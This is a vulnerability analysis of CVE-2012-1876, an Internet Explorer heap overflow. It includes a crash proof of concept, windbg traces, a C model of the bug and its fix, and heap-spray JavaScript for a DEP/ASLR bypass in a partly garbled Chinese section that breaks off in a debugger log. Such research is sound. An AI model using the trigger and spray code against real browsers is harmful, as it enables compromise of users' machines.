CVE-2012-1876 Internet Explorer Heap Overflow Vulnerability Analysis
Table of Contents
- Vulnerability Description
- IE Browser Components
- Analysis Environment
- POC
- Vulnerability Analysis
- Exploitation
- References
Vulnerability Description
The root cause of this IE vulnerability lies in the CTableLayout::CalculateMinMax function of the mshtml.dll module: while running, the program uses the span attribute of a col element in the HTML as the loop count for writing data into the heap. If that span value is set inappropriately, a heap overflow results.
IE Browser Components
The key to the Internet Explorer architecture is its use of the Component Object Model (COM), which governs the interaction of all the components and makes them reusable and extensible. The figure below illustrates the main components of Internet Explorer.
- IExplore.exe sits at the top; it is the Internet Explorer executable and relies on the other IE components for rendering, navigation, protocol handling, and so on
- Browseui.dll provides the Internet Explorer user interface, including the address bar, status bar, and menu bar
- Shdocvw.dll provides navigation, history, and similar features; this DLL exposes the ActiveX control interface
- Mshtml.dll is the core of Internet Explorer and is responsible for parsing HTML and CSS
- Urlmon.dll provides MIME handling and code download
- WinInet.dll is the Windows Internet protocol handler; it implements the HTTP and FTP protocols and cache management
Analysis Environment
| Item | Setting |
| --- | --- |
| Virtual machine | Win7 x86 |
| IE browser | 8.0 |
| Debugger | windbg |
POC
```html
<html>
<body>
<table style="table-layout:fixed" ><col id="132" width="41" span="6" >  </col></table>
<script>
function over_trigger() {
    var obj_col = document.getElementById("132");
    obj_col.width = "42765";
    obj_col.span = 666;
}
setTimeout("over_trigger();",1);
</script>
</body>
</html>
```
The code above is straightforward: the span attribute is 6 when the element is first created, and the over_trigger function in the script then updates it dynamically to 666 (this value is arbitrary, as long as it is large enough to guarantee an overflow).
Vulnerability Analysis
Save the PoC as an HTML file and double-click it; IE shows a blocked-content prompt. At this point attach windbg to the IE process.
Two IE processes appear in the attach list; pick the second one, the child process belonging to the current tab. Then set the following breakpoints:
```
0:012> bp mshtml!CTableLayout::CalculateMinMax
0:012> bp mshtml!_HeapRealloc
0:012> bp mshtml!CTableCol::GetAAspan
```
The root cause is in CTableLayout::CalculateMinMax, so a breakpoint there is essential; because this is a heap overflow, we also break on _HeapRealloc. Finally, CTableCol::GetAAspan is the function that retrieves the span attribute value.
```
0:012> bd 1 2
0:012> bl
0 e 6bcca078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 d 6bd7d7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 d 6bc4a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
```
Next, temporarily disable breakpoints 1 and 2, enter g to run, allow the blocked content in IE, and click OK on the warning that pops up.
```
0:012> g
ModLoad: 6bb30000 6bbe2000   C:\Windows\System32\jscript.dll
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00412802 edx=ffffffff esi=00000000 edi=0245c334
eip=6891a078 esp=0245c0d8 ebp=0245c2f0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff            mov     edi,edi
```
Back in windbg, the program has stopped for the first time at the entry of CTableLayout::CalculateMinMax; this is the pass that handles the initial creation with span = 6.
```
0:005> kb
ChildEBP RetAddr  Args to Child
0245c0d4 6891a6b8 004899c0 0245c368 00000000 mshtml!CTableLayout::CalculateMinMax
0245c2f0 68910879 0245c368 0245c334 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245c49c 68a1566c 0245d3b8 0245c6c8 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0245c5d4 68a118f9 004899c0 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
......
```
Next, look at the call stack and at the declaration of CTableLayout::CalculateMinMax:
```cpp
void __thiscall CTableLayout::CalculateMinMax(CTableLayout *theTableLayoutObj, LPVOID lpUnknownStackBuffer);
```
We mainly care about the CTableLayout *theTableLayoutObj parameter. It is a pointer, and from the kb output above its value is 004899c0.
Now look at the contents at 004899c0: 68819aa0 is the vftable value, 00000006 is the span attribute value, and the rightmost 0 is the start address of the requested heap space, which is still NULL because nothing has been allocated yet.
```
0:005> be 1 2
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
```
Now re-enable breakpoints 1 and 2.
```
0:005> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=000000a8 edx=00000000 esi=00489a5c edi=00489a50
eip=689cd7a5 esp=0245c00c ebp=0245c024 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!_HeapRealloc:
689cd7a5 8bff            mov     edi,edi
```
Enter g to run; the program breaks at the start of mshtml!_HeapRealloc.
The program requests heap space to hold the column style information. Each style entry occupies 0x1C bytes, and the number of entries is determined by the span attribute value.
Since span is 6 in the PoC, the heap space requested here is 0x1C*6 = 0xA8, which is the value in ecx when _HeapRealloc breaks.
```
0:005> gu
eax=00000000 ebx=00000000 ecx=775a5dd3 edx=004b6657 esi=00489a5c edi=00489a50
eip=689e34e2 esp=0245c014 ebp=0245c024 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CImplAry::EnsureSizeWorker+0xa1:
689e34e2 8bd8            mov     ebx,eax
```
Next, run gu to execute until the function returns. Once _HeapRealloc has completed, look at the CTableLayout *theTableLayoutObj object again:
```
0:005> dd 004899c0 L30
004899c0  68819960 00464528 00439648 689ce3b8
004899d0  00000001 00000000 0108080d ffffffff
004899e0  00000000 00000000 00000000 ffffffff
004899f0  00017700 0000b478 00000000 00000000
00489a00  00000000 00412802 00000000 00000000
00489a10  00000000 00000006 00000000 ffffffff
00489a20  00000000 ffffffff 6881a594 00000004
00489a30  00000004 00475ed8 6881a594 00000018
00489a40  00000006 004a3660 00000000 00000000
00489a50  6881a594 00000000 00000000 004b6658
00489a60  00000000 00000000 00000000 00000000
00489a70  00000000 00000000 00000000 00000000
```
The start address of the heap space has now changed from NULL to 004b6658.
```
0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245c02c ebp=0245c0d4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff            mov     edi,edi
0:005> gu
eax=00000006 ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000      cmp     eax,3E8h
```
Continuing, the program breaks at CTableCol::GetAAspan, which retrieves the span value used as the loop count when writing the style entries. The result is returned in eax, and here eax is 6.
```
0:005> ba w1 004b6658
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
3 e 004b6658 w 1 0001 (0001)  0:****
0:005> g
Breakpoint 3 hit
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245c014 ebp=0245c01c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a            jmp     mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)
```
Now let's look at how the program writes the style entries into the allocated heap space: set a write breakpoint on the start address of the heap block, then enter g to run, and the breakpoint hits.
From the PoC, the width attribute is 41 at this point; the value written at 004899c0 is width*100 = 41*100 = 0x00001004, which is the value of ebx when the breakpoint hits. By the time the breakpoint fires, all 0x1C bytes of the entry have already been written, so we single-step onward.
```
0:005> p
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a75 esp=0245c014 ebp=0245c01c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x5b:
68c40a75 5f              pop     edi
......
0:005>
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec          inc     dword ptr [ebp-14h]  ss:0023:0245c0c0=00000000
0:005>
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec          mov     eax,dword ptr [ebp-14h] ss:0023:0245c0c0=00000001
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c        add     dword ptr [ebp-24h],1Ch ss:0023:0245c0b0=00000000
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510          cmp     eax,dword ptr [ebp+10h] ss:0023:0245c0e4=00000006
```
An inc + cmp combination appears, so we can guess that this is the loop that controls writing the style entries into the heap space.
These instructions mean: [ebp-14h] is incremented by 1 on every iteration, so it is the loop counter; [ebp-24h] is incremented by 0x1C each time, the size of one style entry; and finally the current iteration count is compared with the value at [ebp+10h].
```
0:005> dd [ebp+10h] L1
0245c0e4  00000006
```
[ebp+10h] is the span attribute value. Next, let's see what happens once the script has dynamically updated the span attribute, i.e. once span is 666 and the program breaks for the second time at the entry of CTableLayout::CalculateMinMax. In theory the space should be reallocated, since 660 more style entries have to be written; then the current span value should be fetched as the loop count, and only then should the style entries be written into the heap.
We go to where the program has now stopped, and while there confirm that 6 style entries were indeed written earlier.
```
0:005> bd 1 2 3
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 d 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 d 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
3 d 004b6658 w 1 0001 (0001)  0:****
0:005> g
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00402c02 edx=ffffffff esi=00000000 edi=0245bb4c
eip=6891a078 esp=0245b8f0 ebp=0245bb08 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff            mov     edi,edi
0:005> kb L3
ChildEBP RetAddr  Args to Child
0245b8ec 6891a6b8 004899c0 0245bb80 00000000 mshtml!CTableLayout::CalculateMinMax
0245bb08 68910879 0245bb80 0245bb4c 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245bcb4 68a1566c 0245d328 0245bee0 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0:005> dd 004899c0 L30
004899c0  68819960 00464528 00439648 689ce3b8
004899d0  00000001 00000000 010a081d 00002580
004899e0  00000000 00000000 0041da18 ffffffff
004899f0  00017700 0000b478 00000708 00000001
00489a00  00000000 00402c02 00000000 00000000
00489a10  00000000 00000006 ffffffff ffffffff
00489a20  ffffffff ffffffff 6881a594 00000004
00489a30  00000004 00475ed8 6881a594 00000018
00489a40  00000006 004a3660 00000000 00000000
00489a50  6881a594 00000018 00000006 004b6658
00489a60  00000000 00000000 00000000 00000000
00489a70  00000000 00000000 00000000 00000000
```
The next step should be the heap allocation, so enable the _HeapRealloc breakpoint and run g.
```
0:005> be 1 2
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
3 d 004b6658 w 1 0001 (0001)  0:****
0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245b844 ebp=0245b8ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff            mov     edi,edi
0:005> gu
eax=0000029a ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000      cmp     eax,3E8h
```
Instead, we find that the program skipped the heap allocation altogether: it wrongly assumed that the previously allocated space was still sufficient and went straight to fetching the span attribute value that controls the loop count into eax. When CTableCol::GetAAspan returns, eax is 0x29a, i.e. 666 in decimal.
What follows is the same style-writing process as before, except that this time 666 style entries are written into a heap block that can hold only 6, which causes the heap overflow.
```
0:005> be 3
0:005> bd 1 2
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 d 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 d 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
3 e 004b6658 w 1 0001 (0001)  0:****
0:005> g
Breakpoint 3 hit
eax=04141148 ebx=00414114 ecx=004b6670 edx=00004141 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245b82c ebp=0245b834 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a            jmp     mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)
```
Enable the write breakpoint on the heap block so that we stop when the heap is written, then keep single-stepping.
```
0:005>
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec          inc     dword ptr [ebp-14h]  ss:0023:0245b8d8=00000000
0:005>
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec          mov     eax,dword ptr [ebp-14h] ss:0023:0245b8d8=00000001
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c        add     dword ptr [ebp-24h],1Ch ss:0023:0245b8c8=00000000
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510          cmp     eax,dword ptr [ebp+10h] ss:0023:0245b8fc=0000029a
```
Then examine the value at ebp+10h:
```
0:005> dd ebp+10h L1
0245b8fc  0000029a
```
We can see that ebp+10h now holds the span attribute value 0x29a, so the program will eventually run the loop 666 times. After the heap overflow the program keeps running, which leads to a memory access violation and crashes IE.
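As an added illustration (not code from this article or from mshtml), the following C model reproduces the control-flow shape the trace above exposes: the column-entry buffer is sized from the span value seen when it is first allocated, the write loop runs span times, and the second layout pass skips the reallocation, so raising span from 6 to 666 walks 660 entries of 0x1C bytes past the buffer. The ColCalc and TableLayout types, the calc_min_max_* names and the entry field layout are assumptions; the hardened variant simply re-validates the capacity against the current span on every pass. Out-of-bounds writes are counted rather than performed, so the model runs safely.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* One column style entry is 0x1C bytes (from the trace). The field layout is
   an assumption: only the first dword, width * 100, is modelled. */
#define COL_CALC_BYTES 0x1C

typedef struct {
    uint32_t width_x100;                 /* first dword written: width * 100 */
    uint8_t  rest[COL_CALC_BYTES - 4];   /* pads the entry to 0x1C bytes */
} ColCalc;

typedef struct {
    ColCalc *entries;   /* heap buffer holding the column entries */
    int      capacity;  /* entries the buffer can hold */
} TableLayout;

/* Grow the buffer if it cannot hold `needed` entries; stand-in for the
   CImplAry::EnsureSizeWorker -> _HeapRealloc path. Returns 0 on success. */
static int ensure_size(TableLayout *t, int needed) {
    if (needed <= t->capacity) return 0;
    ColCalc *p = realloc(t->entries, (size_t)needed * sizeof(ColCalc));
    if (p == NULL) return -1;
    t->entries = p;
    t->capacity = needed;
    return 0;
}

/* Vulnerable shape: allocate on the first pass only and trust the old buffer
   afterwards, while the loop bound comes from the current span. Returns how
   many entries would land past the buffer (0 = no overflow); those writes
   are counted, not performed, so the model is safe to run. */
int calc_min_max_vulnerable(TableLayout *t, int span, uint32_t width) {
    if (t->entries == NULL && ensure_size(t, span) != 0) return -1;
    int overflow = 0;
    for (int i = 0; i < span; i++) {
        if (i >= t->capacity) { overflow++; continue; }
        t->entries[i].width_x100 = width * 100;
    }
    return overflow;
}

/* Hardened shape: re-validate the capacity against the current span on
   every pass before writing. */
int calc_min_max_fixed(TableLayout *t, int span, uint32_t width) {
    if (ensure_size(t, span) != 0) return -1;
    for (int i = 0; i < span; i++) t->entries[i].width_x100 = width * 100;
    return 0;
}

void layout_free(TableLayout *t) {
    free(t->entries);
    t->entries = NULL;
    t->capacity = 0;
}

typedef int (*calc_fn)(TableLayout *, int, uint32_t);

/* Replay the PoC: span 6 on the first layout pass, 666 on the second.
   Returns the second pass's overflow count; reports the final capacity and
   the first dword written on pass one (41 * 100 = 0x1004, as in the trace). */
int replay_poc(calc_fn calc, int *capacity_out, uint32_t *first_entry_out) {
    TableLayout t = {0};
    if (calc(&t, 6, 41) != 0) { layout_free(&t); return -1; }
    *first_entry_out = t.entries[0].width_x100;
    int overflow = calc(&t, 666, 41);
    *capacity_out = t.capacity;
    layout_free(&t);
    return overflow;
}

/* Convenience wrappers for the two scenarios. */
int vulnerable_overflow_count(void) { int c; uint32_t f; return replay_poc(calc_min_max_vulnerable, &c, &f); }
int vulnerable_final_capacity(void) { int c; uint32_t f; replay_poc(calc_min_max_vulnerable, &c, &f); return c; }
int fixed_overflow_count(void)      { int c; uint32_t f; return replay_poc(calc_min_max_fixed, &c, &f); }
int fixed_final_capacity(void)      { int c; uint32_t f; replay_poc(calc_min_max_fixed, &c, &f); return c; }
uint32_t first_entry_value(void)    { int c; uint32_t f; replay_poc(calc_min_max_fixed, &c, &f); return f; }

int main(void) {
    printf("vulnerable: first entry 0x%x, capacity %d, entries past buffer %d\n",
           first_entry_value(), vulnerable_final_capacity(), vulnerable_overflow_count());
    printf("fixed:      first entry 0x%x, capacity %d, entries past buffer %d\n",
           first_entry_value(), fixed_final_capacity(), fixed_overflow_count());
    return 0;
}
```

The defensive point is the one the trace makes: the decision to grow the buffer must be taken from the value that bounds the loop, at the time the loop runs, not from a cached size recorded on an earlier pass.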
總結(jié):
漏洞利用
要利用堆溢出漏洞,需要先確定溢出時用于覆蓋的內(nèi)容和位置。為了繞過DEP和ASLR的保護(hù),VUPEN通過溢出漏洞覆蓋BSTR字符串長度的值,然后通過JavaScript讀取CButtonLayout虛表指針,通過固定偏移量找到mshtml.dll基址,用它來構(gòu)造ROP指令,以此繞過DEP和ASLR
為了繞過DEP和ASLR,首先需要構(gòu)造堆布局以便將mshtml.dll基址泄露出來,下面的代碼就是用于構(gòu)造堆布局的
```html
<div id="test"></div>
<script language='javascript'>
var leak_index = -1;
var dap = "EEEE";
while ( dap.length < 480 ) dap += dap;
var padding = "AAAA";
while ( padding.length < 480 ) padding += padding;
var filler = "BBBB";
while ( filler.length < 480 ) filler += filler;
//spray
var arr = new Array();
var rra = new Array();
var div_container = document.getElementById("test");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
    // E
    rra[i] = dap.substring(0, (0x100-6)/2);
    // S, bstr = A
    arr[i] = padding.substring(0, (0x100-6)/2);
    // A, bstr = B
    arr[i+1] = filler.substring(0, (0x100-6)/2);
    // B
    var obj = document.createElement("button");
    div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
    rra[i] = null;
    CollectGarbage();
}
</script>
```
The JavaScript above first creates a 0x100-byte string "EEEE", then equally sized "AAAA" and "BBBB" strings, and finally creates a button element, i.e. a CButtonLayout object.
In IE these strings are BSTRs (short for Basic String): Unicode strings with a length prefix and a NULL terminator, so the character count is half the byte count, which is why the code above divides by 2 when sizing the strings.
Then, starting from the middle of the rra array, every other element is freed, leaving holes that later 0x100-byte allocations can occupy.
The resulting heap layout is as follows:
[Figure: heap layout after the spray and the interleaved frees (image assets/1565860060218.png not available)]
The freed positions are there so that, when the vulnerable heap block vulheap is allocated, it occupies one of those holes; when the overflow then occurs it can overwrite the AAAA and BBBB that follow.
```html
<table style="table-layout:fixed" ><col id="0" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="1" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" >  </col></table>
```
Next, a run of col elements, 132 in all, is created to occupy the freed "EEEE" positions.
To determine whether the allocated vulheap actually lands in a freed "EEEE" position, we first set a breakpoint on the function that frees the memory, CollectGarbage, which corresponds to JsCollectGarbage in jscript.dll.
[Figure (image assets/1565921432705.png not available)]
First load the IE process in Windbg:
```
0:012> .childdbg 1
Processes created by the current process will be debugged
```
and run .childdbg to enable child-process debugging.
```
0:012> sxe ld:jscript
```
Because IE has not loaded jscript.dll yet at startup, first set a break on the loading of jscript.dll.
```
0:012> g
ModLoad: 6be10000 6bec2000   C:\Windows\System32\jscript.dll
eax=00000000 ebx=00000000 ecx=00000074 edx=004c0e94 esi=7ffd9000 edi=022ac19c
eip=775970b4 esp=022ac0b4 ebp=022ac108 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
775970b4 c3              ret
```
Then enter g and click to allow the blocked content; the program breaks when jscript.dll is loaded.
```
0:005> bp jscript!JsCollectGarbage
```
After the break, set a breakpoint on JsCollectGarbage. Because freeing a heap block ultimately reaches the low-level function ntdll!RtlFreeHeap, whose third argument is the address of the block being freed, we can break on it and record and print the address of every freed block.
```
0:005> bd 0
0:005> bl
0 d 6be983d3     0001 (0001)  0:**** jscript!JsCollectGarbage
0:005> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"
```
Before setting that breakpoint, disable the JsCollectGarbage breakpoint so that the program is not interrupted over and over.
The vulheap block is allocated by the call to CImplAry::EnsureSizeWorker inside CTableLayout::CalculateMinMax, and the allocated address is stored at [ebx+9c]. The instruction following the CImplAry::EnsureSizeWorker call is at mshtml!CTableLayout::CalculateMinMax+0x16d, so the vulheap address can be obtained with a breakpoint like this:
```
0:005> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"
```
Since this produces a lot of log output, save the log to a file:
```
0:005> .logopen c:\log.txt
Opened log file 'c:\log.txt'
```
When recording is complete, close it with .logclose:
```
0:005> .logclose
Closing open log file c:\log.txt
```
After saving, the last vulheap entry in the log is the one we want.
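To read such a saved log back without scrolling through it by hand, here is an added C helper (not from this article) that walks the "free heap" and "vulheap" records the two breakpoint commands above emit and reports whether the address of the last vulheap coincides with one of the freed block addresses. The sample log is constructed for the example, and the LogSummary type and function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample of what the two breakpoints above log: ".echo free heap"
   followed by one db row, ".echo vulheap" followed by one dd row. Addresses
   and bytes are invented for the example. RtlFreeHeap is also called with
   NULL at times, which shows up as a 00000000 row and is ignored. */
static const char *SAMPLE_LOG =
    "free heap\n"
    "03f2ae30  45 00 45 00 45 00 45 00-45 00 45 00 45 00 45 00  E.E.E.E.E.E.E.E.\n"
    "free heap\n"
    "00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????\n"
    "free heap\n"
    "03f2b290  45 00 45 00 45 00 45 00-45 00 45 00 45 00 45 00  E.E.E.E.E.E.E.E.\n"
    "vulheap\n"
    "03f2c100  00001004 00001004 00001004 00000000\n"
    "vulheap\n"
    "03f2b290  00001004 00001004 00001004 00000000\n";

#define MAX_FREED 4096

typedef struct {
    unsigned long freed[MAX_FREED];  /* addresses logged after "free heap" */
    size_t        nfreed;
    unsigned long last_vulheap;      /* address logged after the last "vulheap" */
    int           nvulheap;
} LogSummary;

/* Accept a dump row only if it starts with exactly eight hex digits, so that
   register lines such as "eax=..." are never mistaken for an address. */
static int leading_addr(const char *s, unsigned long *out) {
    while (*s == ' ') s++;
    char *end;
    unsigned long v = strtoul(s, &end, 16);
    if (end - s != 8 || (*end != ' ' && *end != '\0')) return 0;
    *out = v;
    return 1;
}

/* Walk the log line by line; a marker is followed by its dump row on the next
   line, but a marker with the address on the same line is accepted too. */
void summarize_log(const char *log, LogSummary *sum) {
    enum { NONE, FREE, VUL } expect = NONE;
    char line[256];
    const char *p = log;
    memset(sum, 0, sizeof *sum);
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full < sizeof line - 1 ? full : sizeof line - 1;
        unsigned long addr = 0;
        int have_addr = 0;
        memcpy(line, p, len);
        line[len] = '\0';
        if (strncmp(line, "free heap", 9) == 0) {
            expect = FREE;
            have_addr = leading_addr(line + 9, &addr);
        } else if (strncmp(line, "vulheap", 7) == 0) {
            expect = VUL;
            have_addr = leading_addr(line + 7, &addr);
        } else if (expect != NONE) {
            have_addr = leading_addr(line, &addr);
            if (!have_addr) expect = NONE;   /* marker not followed by a row */
        }
        if (have_addr) {
            if (expect == FREE) {
                if (addr != 0 && sum->nfreed < MAX_FREED) sum->freed[sum->nfreed++] = addr;
            } else {
                sum->last_vulheap = addr;
                sum->nvulheap++;
            }
            expect = NONE;
        }
        p = nl ? nl + 1 : p + full;
    }
}

/* Index of the freed block the last vulheap landed in, or -1 if it reused
   none of them (in which case the layout needs adjusting). */
int vulheap_reused_slot(const LogSummary *sum) {
    for (size_t i = 0; i < sum->nfreed; i++)
        if (sum->freed[i] == sum->last_vulheap) return (int)i;
    return -1;
}

/* Wrappers over the constructed sample. */
int sample_freed_count(void)            { LogSummary s; summarize_log(SAMPLE_LOG, &s); return (int)s.nfreed; }
int sample_vulheap_count(void)          { LogSummary s; summarize_log(SAMPLE_LOG, &s); return s.nvulheap; }
unsigned long sample_last_vulheap(void) { LogSummary s; summarize_log(SAMPLE_LOG, &s); return s.last_vulheap; }
int sample_reused_slot(void)            { LogSummary s; summarize_log(SAMPLE_LOG, &s); return vulheap_reused_slot(&s); }

int main(void) {
    printf("%d freed blocks, %d vulheap allocations, last vulheap %08lx\n",
           sample_freed_count(), sample_vulheap_count(), sample_last_vulheap());
    int slot = sample_reused_slot();
    if (slot >= 0) printf("last vulheap reuses freed block #%d\n", slot);
    else printf("last vulheap did not land in a freed block\n");
    return 0;
}
```

To use it on a real c:\log.txt, read the file into a buffer and pass it to summarize_log in place of SAMPLE_LOG; the eight-hex-digit check keeps the exception banner and register dumps that also end up in the log from being mistaken for dump rows.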
```
free heap
083f2ef0  e8 d2 56 69 00 0d 4c 00-d0 62 83 04 38 04 4c 00  ..Vi..L..b..8.L.
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
(3f4.c0): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=083f5d20 ecx=00000000 edx=00000009 esi=022ac580 edi=00000000
eip=694ba1b2 esp=020b3000 ebp=022ac2ec iopl=0         nv up ei pl zr na pe nc
